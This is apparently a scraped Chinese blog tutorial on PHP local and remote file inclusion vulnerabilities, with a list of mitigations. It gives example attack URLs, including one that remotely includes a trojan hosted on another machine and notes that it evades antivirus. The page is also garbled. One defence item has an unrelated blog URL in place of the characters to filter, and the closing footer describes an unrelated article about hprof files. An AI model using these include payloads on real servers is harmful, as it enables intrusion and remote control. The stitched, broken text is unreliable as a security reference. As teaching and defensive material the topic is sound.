包含的文件没有做好过滤,攻击者可构造自己的图片木马当作脚本文件解析,只要用了文件包含函数,参数没做好过滤,不管参数是什么类型的文件,都会被当做脚本文件解析,PHP对于包含文件所提供的功能太强大,太灵活,所以文件包含漏洞经常出现在PHP语言中,其他语言也有,不多。
include()
用的多,包含文件有问题,返回警告,脚本继续执行
include_once()
用的多,包含文件有问题,返回警告脚本继续执行,加载一次,不重复加载
require()
用的少,包含文件有问题,脚本停止执行,重要程序,一般不用
require_once()
用的少,包含文件有问题,脚本停止执行,加载一次,不重复加载,重要程序,一般不用
本地包含 LIF
本地包含漏洞多:http://10.0.0.129:90/11.php?id=22.jpg
远程包含 RLF
前提条件
allow_url_include=on,开启远程包含,修改php.ini配置文件
magic_quotes_gpc=off,魔术符号关闭,修改php.ini配置文件
默认是关闭的,很少开启,所以远程包含漏洞一般很少,绝大多数都是攻击者自己开启的,木马文件不落地,木马上传到本地容易被waf,杀毒软件查杀,包含其他主机的文件,攻击的时候,木马没在被攻击的机器上,在攻击者的电脑上,以内存的方式运行,对方查不到木马,远程操控服务器,木马文件没落地 http://10.0.0.129:90/11.php?id=http://10.0.0.131:80/33.jpg
1.白名单过滤
2.过滤https://blog.csdn.net/Chales123/article/等特殊符号
3.修改Apache日志文件的存放地址
4.开启魔术引号magic_quotes_qpc=on
5.禁止远程文件包含allow_url_include=off
6.配置open_basedir=指定目录,限制访问区域。
7.尽量不要使用动态变量调用文件,直接写要包含的文件。
到此这篇hprof是什么文件会一直增加(hprof文件怎么产生的)的文章就介绍到这了,更多相关内容请继续浏览下面的相关 推荐文章,希望大家都能在编程的领域有一番成就!
版权声明:
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若内容造成侵权、违法违规、事实不符,请将相关资料发送至xkadmin@xkablog.com进行投诉反馈,一经查实,立即处理!
转载请注明出处,原文链接:https://www.xkablog.com/rfx/46541.html